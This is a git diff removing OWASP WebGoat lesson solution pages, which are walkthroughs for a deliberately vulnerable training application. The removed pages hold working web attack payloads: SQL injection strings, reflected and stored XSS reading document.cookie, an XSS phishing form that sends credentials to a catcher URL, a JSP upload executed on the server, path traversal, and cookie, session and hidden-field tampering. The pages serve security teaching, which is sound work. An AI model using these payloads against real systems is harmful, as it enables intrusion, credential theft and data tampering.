-
-
-
How the
-attacks works: The attack
-is based on fooling the human eye in log files. An attacker can erase his
-traces from the logs using this attack.
-
-
-
-
General
-Goal(s):
-
-
The
-grey area below represents what is going to be logged in the web server's log
-file.
-Your goal is to make it like a username "admin" has succeeded into
-logging in.
-Elevate your attack by adding a script to the log file.
-
-
-
-
-
-
Figure 1 Log Spoofing
-
-
-
-
Solution:
-
-
-
-
This lesson accepts any input for a username and appends the information
-to the log file.
-
-
-
-
Enter for username the text: smith Login Succeeded for username admin
-
-
-
-
-
-
Figure 2 Log spoof with long text
-
-
-
-
The text is added to the same line, not a new line. But any input is
-allowed.
-
-
In this way you can inject carriage return (%0d) and line feed (%0a) to
-the application.
-
-
-
-
Fill out the following text for the username: Smith%0d%0aLogin Succeeded
-for username: admin
-
-
-
-
-
-
Figure 3 Lesson completed
-
-
-
-
An attacker
-can use this attack to add malicious JavaScript to the log file, which will be
-viewed by the administrator using a browser. What happens when you inject admin
-<script>alert(document.cookie)</script> for the username?
Concept / Topic To Teach:
-Many sites allow the user to upload files, such as images or videos. Without the proper security, files containing malicious commands can be and then executed on the server.
-
-
-
General Goal(s):
-The form below allows you to upload an image which will be displayed on this page. Features like this are often found on web based discussion boards and social networking sites. This feature is vulnerable to Malicious File Execution.
-
-In order to pass this lession, upload and run a malicious file. In order to prove that your file can execute, it should create another file named guest.txt
-
-Once you have created this file, you will pass the lesson.
-
-
-Solution:
-The first step of malicious file execution is to create a file that we can run on the server. In this lesson, our goal is to create the file guest.txt in the directory provided in the lesson (the path is generated based on your system).
-To do this, we write a .jsp file that uses the java createNewFile() command. The file contents will look like this:
-
-<HTML>
-<%
-java.io.File file = new java.io.File("filepath\\guest.txt");
-file.createNewFile();
-%>
-</HTML>
-The <% indicates that the upcoming code is a java servlet, so java code is allowed. Make sure you fill in the filepath correctly - each directory must be separated by \\, not \. The filename of the .jsp doesn't matter, as long as you know what it is.
-Next, we need to figure out where the files are being uploaded so we can execute them. In this case, since we are shown the image, this is very easy. Upload an image using the form, then right click on it and check its properties.
-
-Viewing properties of the uploaded image in Firefox.
-
-File path for the uploaded image (and our .jsp) in Firefox.
-The URL should look something like http://localhost/WebGoat/uploads/image.jpg.
-The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like http://localhost/WebGoat/uploads/yourfile.jsp.
-A blank page will load. You can then return to the lesson and refresh, completing the lesson.
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/MultiLevelLogin1.html b/src/main/webapp/lesson_solutions_1/MultiLevelLogin1.html
deleted file mode 100644
index d45f1508b..000000000
--- a/src/main/webapp/lesson_solutions_1/MultiLevelLogin1.html
+++ /dev/null
@@ -1,71 +0,0 @@
-
-
-
-
-Multi Level Login 1
-
-
-
-
Lesson Plan Title: Multi Level Login 1
-
-
Concept / Topic To Teach:
-A Multi Level Login should provide a strong authentication.
-This is archived by adding a second layer. After having logged
-in with your user name and password you are asked for a
-'Transaction Authentication Number' (TAN). This is often used by
-online banking. You get a list with a lots of TANs generated only
-for you by the bank. Each TAN is used only once. Another method is
-to provide the TAN by SMS. This has the advantage that an attacker
- can not get TANs provided by the user.
-
-
-
General Goal(s):
-In this Lesson you try to get around the strong authentication.
-You have to break into another account. The user name, password
-and a already used TAN is provided. You have to make sure the server
-accept the TAN even it is already used.
-
-
-Solution:
-This Lesson has two stages. The first stage is only to show how a multi level login
-works. In the second you have to break the strong authentication.
-
-Stage 1
-This stage should be rather straight forward. Give in as name Jane
-and as password tarzan.
-
-
-Figure 1: Login Screen
-
-Afthr clicking on the submit button
-you will be asked for the TAN.
-
-
-Figure 2: TAN Screen
-
-
-Choose the correct TAN from the
-list provided, click on the submit button and you are done.
-
-
-Stage 2
-The first step in this stage is equal to Stage 1. Log in as Jane with tarzan as password.
-Now you will be asked for a TAN. Unfortunately you have only a already
-used TAN from the victim. Fill in the TAN you have and make sure that WebScarab
-will intercept the next request. Hit the submit button and change the hidden_tan
-value to 1.
-
-
-Figure 3: Manipulation Of The Hidden Field With WebScarab
-
-Congratulations you are logged in as Jane.
-
-
-
-Figure 4: Manipulation Of The Hidden Field With WebScarab
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/MultiLevelLogin2.html b/src/main/webapp/lesson_solutions_1/MultiLevelLogin2.html
deleted file mode 100644
index bb63045b9..000000000
--- a/src/main/webapp/lesson_solutions_1/MultiLevelLogin2.html
+++ /dev/null
@@ -1,43 +0,0 @@
-
-
-
-
-Multi Level Login 2
-
-
-
-
Lesson Plan Title: Multi Level Login 2
-
-
Concept / Topic To Teach:
-A Multi Level Login should provide a strong authentication.
-This is archived by adding a second layer. After having logged
-in with your user name and password you are asked for a
-'Transaction Authentication Number' (TAN). This is often used by
-online banking. You get a list with a lots of TANs generated only
-for you by the bank. Each TAN is used only once. Another method is
-to provide the TAN by SMS. This has the advantage that an attacker
- can not get TANs provided by the user.
-
-
-
General Goal(s):
-In this lesson you have to try to break into another account.
-You have an own account for WebGoat Financial but you want to log into
-another account only knowing the user name of the victim to attack.
-
-
-Solution:
-The solution for this lesson is similar to the solution from
-multi level login 1 stage 2 but the approach is a little different.
-This time you have only the user name of your victim but an own account
-on WebGoat Financial.
-Log in as Joe with password banana. Now make sure the next request will be intercepted
-by WebScarab. Fill in the TAN you are asked for and hit the submit button.
-Change now the hidden_user value from Joe to Jane and you are logged in
-as Jane.
-
-
-Figure 1: Manipulation Of The Hidden Field With WebScarab
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/OffByOne.html b/src/main/webapp/lesson_solutions_1/OffByOne.html
deleted file mode 100644
index 0447a1fbc..000000000
--- a/src/main/webapp/lesson_solutions_1/OffByOne.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-Solution: Modify Data with SQL
-
-
-
-
Lesson Plan Title: Off By One Buffer Overflows
-
-
This new lesson does not yet have a detailed solution. If you would like to provide a solution for this lesson, please send an e-mail to WebGoat@owasp.org.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/PasswordStrength.html b/src/main/webapp/lesson_solutions_1/PasswordStrength.html
deleted file mode 100644
index 39f816477..000000000
--- a/src/main/webapp/lesson_solutions_1/PasswordStrength.html
+++ /dev/null
@@ -1,37 +0,0 @@
-
-
-
-
-password Strength
-
-
-
-
Lesson Plan Title: Password Strength
-
-
Concept / Topic To Teach:
-
-Accounts are only as secure as there passwords. Most users have the same weak password everywhere. If you want to protect them against brute-force-attacks your application should have good requirements for passwords. The password should contain lower case letters, capitals and numbers. The longer the password, the better.
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/PathBasedAccessControl.html b/src/main/webapp/lesson_solutions_1/PathBasedAccessControl.html
deleted file mode 100644
index 80c9bdb5a..000000000
--- a/src/main/webapp/lesson_solutions_1/PathBasedAccessControl.html
+++ /dev/null
@@ -1,650 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Bypass a Path Based Access
-Control Scheme
-
-
Concept / Topic To Teach:
-
-In a path based access control scheme,
-an attacker can traverse a path by providing relative path information.
-Therefore an attacker can use relative paths to access files that normally are
-not directly accessible by anyone, or would otherwise be denied if requested
-directly.
-
-
General Goal(s):
-
-The user should be able to
-access a file that is not in the listed directory.
-
-
-
-
Figure 1 Lesson 8
-
-
-
-
Solution:
-
-
-
-
This lesson
-can be solved by intercepting the filename in WebScarab and replacing it with
-../main.jsp which is a file located in a folder below the current directory.
Concept / Topic To Teach:
-It is always a good practice to validate all input on the
-server side. XSS can occur when unvalidated user input is used
-in an HTTP response. With the help of XSS you can do a Phishing
-Attack and add content to a page which looks official. It is very
-hard for a victim to determinate that the content is malicious.
-
-
-
General Goal(s):
-The user should be able to add a form asking for username
-and password. On submit the input should be sent to
-http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
-
-
-Solution:
-With XSS it is possible to add further elements to an existing Page.
-This solution consists of two parts you have to combine:
-
-
A form the victim has to fill in
-
A script which reads the form and sends the gathered information to the attacker
-
-A Form with username and password could look like this:
-
Search for this term and you will see that a form is added to the page since the search field accepts HTML.
- The initial </form> tag is to terminate the original search form.
-
-Now you need a script:
-
-<script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+
-document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
-User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
-</script>
-
-
-This script will read the input from the form and send it to the catcher of WebGoat.
-The text in blue should match what is in your address bar. If you are using ports and/or webscarab, it may be different.
-The last step is to put things together. Add a Button to the form which
-calls the script. You can reach this with the onclick="myFunction()" handler:
-
-The final String looks like this:
-</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+
-document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
-User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
-</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
-><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password"
-name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
-
-Search for this String and you will see a form asking for your username and password.
-Fill in these fields and click on the Login Button, which completes the lesson.
Lesson Plan Title: How to Perform Reflected Cross Site
-Scripting (XSS) Attacks
-
-
Concept / Topic To Teach:
-It is always a good practice to validate
-all input on the server side. XSS can occur when unvalidated user input is used
-in an HTTP response. In a reflected XSS attack, an attacker can craft a URL
-with the attack script and post it to another website, email it, or otherwise
-get a victim to click on it.
-
-
General Goal(s):
-For this exercise, your
-mission is to come up with some input containing a script. You have to try to
-get this page to reflect that input back to your browser, which will execute
-the script and do something bad.
-
-
-
-
Figure 1 Lesson 15
-
-
-
-
Solution:
-
-
-
-
Enter
-<script>alert('Bang!')</script> for the PIN value
Applications
-will often have an administrative interface that allows privileged users access
-to functionality that normal users shouldn't see. The application server will
-often have an admin interface as well.
-
-
-
-
General
-Goal(s):
-
-
Try to access
-the administrative interface for WebGoat. You may also try to access the
-administrative interface for Tomcat. The Tomcat admin interface can be accessed
-via a URL (/admin) and will not count towards the completion of this lesson.
-
-
-
-
-
-
Figure 1 Lesson 7
-
-
-
-
Solution:
-
-
-
-
Append &admin=true to the URL in the
-browser and hit "Enter"
-
-
-
-
Open the menu
-"Admin functions" and notice that you have additional menu options like
-"Database Dump", "User Information" and "Product Information".
Lesson
-Plan Title: Same Origin Policy Protection.
-
-
-
-
Concept /
-Topic To Teach:
-
-
A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous calls from the client side to a server. However, as a security measure these requests may only be made to the server from which the client page originated.
-
-
-
-
General
-Goal(s):
-
-
-
-
This exercise demonstrates the Same Origin Policy Protection. XHR requests can only be passed back to the originating server. Attempts to pass data to a non-originating server will fail.
-
-
-
-
-
Solution:
-
-
Click both of the links on the page to see their behavior and complete the lesson.
Concept / Topic To Teach:
-How to steal a session with a 'Session Fixation'
-
-
-
How the attacks works:
-A user is recognized by the server by an unique
-Session ID. If a user has logged in and is authorized
-he does not have to reauthorize when he revisits the
-application as the user is recognized by the Session ID.
- In some applications it is possible to deliver the Session
- ID in the Get-Request. Here is where the attack starts.
-
-
An attacker can send a hyperlink to a
- victim with a chosen Session ID. This can be
- done for example by a prepared mail which looks like an
-official mail from the application administrator. If the victim
- clicks on the link and logs in he is authorized by the
- Session ID the attacker has chosen. The attacker can visit
- the page with the same ID and is recognized as the victim
- and gets logged in without authorization.
-
-
General Goal(s):
-This lesson has several stages. You play the attacker but
-also the victim. After having done this lesson it should be
- understood how a Session Fixation in general works. It should
- be also understood that it is a bad idea to use the Get-Request
- for Session IDs.
-
-
-
-
-Solution:
-This lesson has 4 stages. In stage 1 and 4 you are Hacker Joe
-in lesson 2 and 3 you are the victim Jane.
-
-
-Stage 1:
-You have to send a prepared mail to Jane which looks like a mail from Goat Hills Financial with a link containing a Session ID.
-The mail is already prepared. You only have to alter the link so it includes
-a Session ID (SID). You can archive this by adding &SID=WHATEVER to
-the link. Of course can WHATEVER be replaced by any other string.
-The link should look similar to following:
-<a href=http://localhostattack?Screen=46&menu=320&SID=WHATEVER>
-
-
-
-Figure 1: Prepared Mail
-
-
-
-
-Stage 2:
-Now you are Jane which receives the mail you wrote in stage 1.
-Point with the mouse on the link and you will notice the
-SID in the status bar of your browser. This is the easiest
-stage as you have only to click on the link 'Goat Hills Financial'.
-
-
-
-Figure 2: Received Mail
-
-
-
-
-
-Stage 3:
-You are on the login screen of Goat Financial Hills now. In
-the URL is the SID visible. All
-you have to do is to log in with your user name Jane
-and your password tarzan.
-
-Stage 4:
-The application switches again to the hacker Joe.
-There is already a prepared link you have to click on
-to reach the Goat Hill Financial. In real life this
-would be different of course. You could directly put the URL
-in the address bar of your browser.
-
-
-After having clicked on the provied link you reach
-Goat Hill Financial. Take a look at the URL and
-you will see that your SID is NOVALIDSESSION.
-Change this string to the SID you have chosen
-at the beginning of this lesson and hit enter.
-
-
-Figure 4: Browser Address Bar Before Changes
-
-
-Figure 5: Browser Address Bar After Changes
-
-
-
-Congratulation! You are logged in as Jane
-and the lesson was successful.
-
-
-Figure 6: Successful Completion Of The Lesson
-
-
Lesson
-Plan Title: How to
-Perform Silent Transactions Attacks.
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches how to perform silent transactions attacks.
-
-
-
-
How the
-attacks works:
-
-
Any system that
-silently processes transactions using a single submission is dangerous to the
-client. For example, if a normal web application allows a simple URL
-submission, a preset session attack will allow the attacker to complete a
-transaction without the user's authorization. In Ajax, it gets worse: the
-transaction is silent; it happens with no user feedback on the page, so an
-injected attack script may be able to steal money from the client without
-authorization.
-
-
-
-
General
-Goal(s):
-
-
This is a
-sample internet banking application - money transfer page.
-
-
It shows
-below your balance, the account you are transferring to and amount you will
-transfer.
-The application uses AJAX to submit the transaction after doing some basic
-client side validations.
-Your goal is to try to bypass the user's authorization and silently execute the
-transaction.
-
-
This web
-application uses JavaScript on the client to initiate a transaction for
-transferring money. Examining the HTML source reveals that two JavaScript
-functions are being used:
-
-
-
<script>
-
-
function
-processData(){
-
-
var accountNo =
-document.getElementById('newAccount').value;
-
-
var amount =
-document.getElementById('amount').value;
-
-
if ( accountNo == ''){
-
-
alert('Please enter a valid account number to
-transfer to.')
-
-
return;
-
-
}
-
-
else if ( amount == ''){
-
-
alert('Please enter a valid amount to
-transfer.')
-
-
return;
-
-
}
-
-
var balanceValue =
-document.getElementById('balanceID').innerText;
-
-
balanceValue = balanceValue.replace( new
-RegExp('$') , '');
-
-
if ( parseFloat(amount) >
-parseFloat(balanceValue) ) {
-
-
alert('You can not transfer more funds than
-what is available in your balance.')
var resultsDiv =
-document.getElementById('resultsDiv');
-
-
resultsDiv.innerHTML = '';
-
-
resultsDiv.innerHTML
-= result;
-
-
}}}
-
-
</script>
-
-
-
The function
-processData() is called when the user fills out an account number and an amount
-to transfer. The function processData() will check if the user has sufficient
-balance before initiating the transaction. After validation of the balance, the
-JavaScript function submitData(accountNo, balance) is called which actually
-submits the required information, target account number and the amount to
-transfer, to the back-end web application.
-
-
-
-
If you are
-able to call this JavaScript function submitData(accountNo, balance) from the
-browser, you are able to bypass the client-side validation and execute this
-transaction silently, without an additional approval or digital signature of
-the user.
-
-
-
-
The latest
-generation of browsers allows to call JavaScript from the address bar, using
-javascript:function();. Try to execute: javascript:submitData(1234556,11000);
-
-
-
-
-
-
Figure 2 Follow the hints....
-
-
-
-
-
-
Figure 3 HTTP Request generated from Javascript function
-submitData(123456,110000);
Web
-Services communicate through the use of SOAP requests. These requests are
-submitted to a web service in an attempt to execute a function defined in the
-web service definition language (WSDL). Let's learn something about WSDL files.
-Check out WebGoat's web service description language (WSDL) file.
-
-
-
-
General
-Goal(s):
-
-
Try
-connecting to the WSDL with a browser or Web Service tool. The URL for the web
-service is: http://localhostservices/SoapRequest The WSDL can usually
-be viewed by adding a ?WSDL on the end of the web service request.
-
-
-
-
-
-
Figure 1 - Lesson 21
-
-
-
-
Solution:
-
-
-
-
Click on the
-URL "WebGoat WSDL" to examine the Webservices Description Language file.
-
-
-
-
-
-
Figure 2 - WSDL
-
-
-
-
Count the
-number of operations like getFirstName. There are 4 operations defined.
-
-
-
-
-
-
Figure 3 Enter the ID
-
-
-
-
For the next
-question the getFirstNameRequest method uses an int as parameter type. Enter
-int and click "Submit".
-
-
-
-
-
-
Figure 4 Stage 2 Completed
-
-
-
-
Intercept the
-HTTP Request with WebScarab and click on the “Raw” tab. Make sure that
-“Intercept Responses” is selected.
-
-
-
-
-
Change the POST header to open
- the SoapRequest:
- POST http://localhost/WebGoat/services/SoapRequest HTTP/1.1 (This will vary based on which ports you are using)
-
Change the Content-Type to
- text/xml:
- Content-Type: text/xml
-
Add a header SOAPAction.
- SOAPAction: (No value needs to be specified for this header)
It is important that there is no whitespace (carriage returns or spaces) from the SOAPAction header to the opening XML tag. This generates an error instead of the desired response.
-
-
-
-
-
-
Figure 5 Updated HTTP request with SOAP parameters
Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-
-
-
General Goal(s):
-The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to add a record to the table.
-
-
-Solution:
-In this lesson, we will use the INSERT query, which uses the format:
-INSERT INTO table VALUES (value1, value2);
-In this case, the salaries table has two relevant columns: column 1 is userid, and column 2 is salary.
-We will use the command:
-INSERT INTO salaries VALUES ('rlupin',140000);
-This, however, will not work correctly. We are inserting this in between two single quotes in the command:
-SELECT * FROM salaries WHERE userid='userid';
-If we treated this lesson as we have treated the previous one, our command would look like this:
-SELECT * FROM salaries WHERE userid='whatever'; INSERT INTO salaries VALUES ('rlupin',150000);'
-The statement cannot end with a single quote after the semicolon, so we must comment out the quote using --.
-To complete this lesson, type the following into the field and press go:
-whatever'; INSERT INTO salaries VALUES ('rlupin',140000);--
-If you then search for the userid rlupin, you will see there is new record.
-
-
-New employee record after using an INSERT query.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/SqlModifyData.html b/src/main/webapp/lesson_solutions_1/SqlModifyData.html
deleted file mode 100644
index 90594689a..000000000
--- a/src/main/webapp/lesson_solutions_1/SqlModifyData.html
+++ /dev/null
@@ -1,39 +0,0 @@
-
-
-
-
-Solution: Modify Data with SQL
-
-
-
-
Lesson Plan Title: Modify Data with SQL
-
-
Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-
-
-
General Goal(s):
-The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to modify the salary for userid jsmith.
-
-
-Solution:
-In this lesson, instead of using the SELECT query command, we use the UPDATE command, which uses the format:
-UPDATE table SET column=value WHERE column=value;
-We need to update the table salaries, setting the salary column to a new number.
-We will use the command:
-UPDATE salaries SET salary=999999 WHERE userid='jsmith'
-We also need to end the previous query and leave our last quote open to make a valid statment.
-To complete this lesson, type the following into the field and press go:
-whatever'; UPDATE salaries SET salary=999999 WHERE userid='jsmith
-If you then search for the userid jsmith, you will see the salary has been updated.
-
-
-Updated salary after using a MODIFY query.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/SqlNumericInjection.html b/src/main/webapp/lesson_solutions_1/SqlNumericInjection.html
deleted file mode 100644
index f46d061d1..000000000
--- a/src/main/webapp/lesson_solutions_1/SqlNumericInjection.html
+++ /dev/null
@@ -1,682 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to Perform Numeric SQL Injection
-
-
-
-
Concept /
-Topic To Teach:
-
-
-
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-
General
-Goal(s):
-
-
-The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed.
-
-
-
-
-
-
Solution:
-
-
-
-
-
-
-
The
-application is taking the input from the select box and inserting it at the end of a pre-formed
-SQL command.
-
-
Compound SQL
-statements can be made by joining multiple tests with keywords like AND and OR.
-Try appending a SQL statement that always resolves to true.
-
-
-
-
This is the
-query: SELECT * FROM weather_data WHERE station = 101
-
-
-
-
Intercept the post request with WebScarab and replace 101 with 101 or 1=1!
-
-
-
-
-
-
-
Figure 1 Intercepted Request with WebScarab
-
-
-
-
As the SQL Statement is true for every station you get
-a list of all stations:
Lesson
-Plan Title: How to
-Perform String SQL Injection
-
-
-
-
Concept /
-Topic To Teach:
-
-
-
-
SQL injection
-attacks represent a serious threat to any database-driven site. The methods
-behind an attack are easy to learn and the damage caused can range from
-considerable to complete system compromise. Despite these risks, an incredible
-number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a
-little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that
-will used in OS command, scripts, and database queries, even if the threat of
-SQL injection has been prevented in some other manner.
-
-
-
-
General
-Goal(s):
-
-
The form
-below allows a user to view their credit card numbers. Try to inject an SQL
-string that results in all the credit card numbers being displayed. Try the
-user name of 'Smith'.
-
-
-
-
Solution:
-
-
-
-
Compared with
-the previous lesson, there is now a string parameter and not an integer.
-
-
Strings must be
-terminated with single quotes to have a valid SQL Query.
-
-
-
-
-
-
Figure 1 Lesson 18
-
-
-
-
The query
-used in this lesson is: SELECT * FROM user_data WHERE last_name = 'Your Name'
Lesson Plan Title: How to Perform Stored Cross Site
-Scripting (XSS)
-
-
-
-
Concept / Topic To Teach:
-
-
It is always a
-good practice to scrub all inputs, especially those inputs that will later be
-used as parameters to OS commands, scripts, and database queries. It is
-particularly important for content that will be permanently stored somewhere.
-Users should not be able to create message content that could cause another
-user to load an undesirable page or undesirable content when the user's message
-is retrieved.
-
-
-
-
General Goal(s):
-
-
The user
-should be able to add message content that cause another user to load an
-undesirable page or content.
-
-
-
-
-
-
Figure 1 Lesson 14
-
-
-
-
Solution:
-
-
-
-
Enter this: <script language="javascript"
-type="text/javascript">alert("Ha Ha Ha");</script> in the message text
-box.
-
-
-
-
Figure 2 Stored message
-
-
-
-
-
-
Figure 3 Lesson 14 nearly completed
-
-
-
-
Now enter this: <script language="javascript"
-type="text/javascript">alert(document.cookie);</script> in the message text
-box. You will get your SessionId in a popup.
Lesson
-Plan Title: How to
-Exploit Thread Safety Problems
-
-
-
-
Concept /
-Topic To Teach:
-
-
Web
-applications can handle many HTTP requests simultaneously. Developers often use
-variables that are not thread safe. Thread safety means that the fields
-of an object or class always maintain a valid state when used concurrently by
-multiple threads. It is often possible to exploit a concurrency bug by loading
-the same page as another user at the exact same time.
-Because all threads share the same method area, and the method area is where
-all class variables are stored, multiple threads can attempt to use the same
-class variables concurrently.
-
-
-
-
General
-Goal(s):
-
-
The user
-should be able to exploit the concurrency error in the web application and view
-login information for another user that is attempting the same function at the
-same time.
-
-
-
-
This will
-require the use of two browser windows.
-
-
-
-
-
-
Figure 1 Lesson 2
-
-
-
-
Solution:
-
-
-
-
Open a new
-browser window by pressing CTRL-N. Position the window so that you see both
-input fields. Enter user name "dave" in the left window and user name "jeff" in
-the right window.
-
-
Click very
-fast on the submit button in the right window and then in the left window.
-
-
-
-
-
-
Figure 2 2 Browser Windows
-
-
-
-
The result
-should be that you receive the same data in both windows, even when using a
-different user name!
-
-
-
-
Figure 3 Lesson 2 Completed
-
-
-
-
The root-cause
-of this exploit is that the Java code uses a static variable for the user name.
-When submitting twice, the same thread and hence the same static variable
-containing the username of the first request will be used.
Lesson
-Plan Title: How to
-Perform Cross Site Tracing (XST) Attacks
-
-
-
-
Concept /
-Topic To Teach:
-
-
It
-is always a good practice to scrub all input, especially those inputs that will
-later be used as parameters to OS commands, scripts, and database queries. It
-is particularly important for content that will be permanently stored somewhere
-in the application. Users should not be able to create message content that
-could cause another user to load an undesireable page or undesireable content
-when the user's message is retrieved.
-
-
-
-
General
-Goal(s):
-
-
Tomcat is
-configured to support the HTTP TRACE command. Your goal is to perform a Cross
-Site Tracing (XST) attack.
-
-
-
-
Solution:
-
-
-
-
You need to
-introduce a cross site trace attack. This can be realized by embedding the
-following script in the three digit access code.
It is always
-a good practice to validate all inputs. Most sites allow non-authenticated users
-to send e-mail to a 'friend'. This is a great mechanism for spammers to send
-out email using your corporate mail server.
-
-
-
-
General Goal(s):
-
-
The user
-should be able to send an obnoxious email message.
-
-
-
-
Solution:
-
-
Type a
-malicious script like <script>alert("XSS")</script> and click Send!
-
-
-
-
-
-
Figure 1 Lesson 5
-
-
-
-
-
-
-
-
-
-
Figure 2 Part 1 completed
-
-
-
-
The second
-part of this lesson is to send a mail to a friend from OWASP. This can be
-accomplished by intercepting the request with WebScarab and changing the hidden
-field "to" from webgoat.admin@owasp.org
-to bill.gates@microsoft.com
-
-
-
-
-
-
Figure 3 Change the variable to another e-mail
-address
Web
-Services communicate through the use of SOAP requests. These requests are
-submitted to a web service in an attempt to execute a function defined in the
-web service definition language (WSDL) file.
-
-
-
-
General
-Goal(s):
-
-
This screen
-is the API for a web service. Check the WSDL file for this web service and try
-to get some customer credit numbers.
-
-
-
-
-
-
Figure 1 Lesson 22
-
-
-
-
Solution:
-
-
-
-
Open the WSDL
-file in a new window. There is an operation getCreditCard.
-
-
-
-
-
-
-
-
Intercept the
-request with WebScarab and change the parameter to getCreditCard
Lesson
-Plan Title: How to
-Spoof an Authentication Cookie
-
-
-
-
Concept / Topic To Teach:
-
-
-
-
Many
-applications will automatically log a user into their site if the right
-authentication cookie is specified. Some times the cookie values can be
-guessed if the algorithm for generating the cookie can be obtained. Some
-times the cookies are left on the client machine and can be stolen by
-exploiting another system vulnerability. Some times the cookies maybe
-intercepted using Cross site scripting. This lesson tries to make the
-student aware of authentication cookies and presents the student with a way to
-defeat the cookie authentication method in this lesson.
-
-
-
-
-
-
General Goal(s):
-
-
The user
-should be able to bypass the authentication check.
-
-
-
-
Solution:
-
-
-
-
Make sure
-that you have "Show Cookies" enabled in WebGoat. And you need to disable the
-feature "Inject know cookies into requests" in WebScarab otherwise WebScarab
-will always inject your old cookie and not the new cookie.
-
-
-
-
-
-
Figure 1 Disable "Inject known cookies into
-requests"
-
-
-
-
-
-
Figure 2 Logon with webgoat/webgoat
-
-
-
-
You can login
-with webgoat/webgoat.
-
-
-
-
-
-
Figure 3 Logged on as webgoat
-
-
-
-
Hit
-"Refresh". This refresh will show our AuthCookie. And you are now authenticated
-using this cookie and not with parameters like above.
-
-
-
-
-
-
-
-
There is a
-new cookie called AuthCookie with values 65432ubphcfx. Logout and login with
-aspect/aspect.
-
-
-
-
-
-
Figure 4 Logon as aspect/aspect
-
-
-
-
-
-
Figure 5 Logged on as aspect
-
-
-
-
Hit "Refresh"
-to see the new cookie.
-
-
-
-
-
-
Figure 6 Cookie for user aspect
-
-
-
-
You have now
-a different cookie value for AuthCookie: 65432udfgfb
-
-
-
-
-
-
-
webgoat
-
-
-
ubphcfx
-
-
-
-
-
Aspect
-
-
-
udfgfb
-
-
-
-
-
-
-
This is an transposition
-of the letters of the alphabet. Each letter is replaced with its successor, for
-example t->u, a->b and the user name is reversed. So for user name alice the cookie will
-contain the reversed user name ecila and the successors of the letters. This
-results in fdjmb.
-
-
-
-
Login with
-user name alice
-and intercept the request in WebScarab. Add AuthCookie=65432fdjmb to the
-existing cookie JSESSIONID.
-
-
-
-
-
-
-
-
-
-
Figure 7 Add AuthCookie to request
-
-
-
-
-
-
Figure 8 Lesson 11 Completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID.html b/src/main/webapp/lesson_solutions_1/WeakSessionID.html
deleted file mode 100644
index 2bfff1bc5..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID.html
+++ /dev/null
@@ -1,90 +0,0 @@
-
-
-
-
-Solution: How to Hijack a Session
-
-
-
-
Lesson Plan Title: How to Hijack a Session
-
-
Concept / Topic To Teach:
-Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks.
-
-
-
General Goal(s):
-Try to access an authenticated session belonging to someone else.
-In this lesson we are trying to predict the WEAKID value. THe WEAKID is used to differentiate authenticated and anonymous users of WebGoat.
-
-
-Solution:
-The easiest way to complete this lesson is to use WebScarab's Session ID Analysis feature. The Solution Videos provide another method of uncovering it as well.
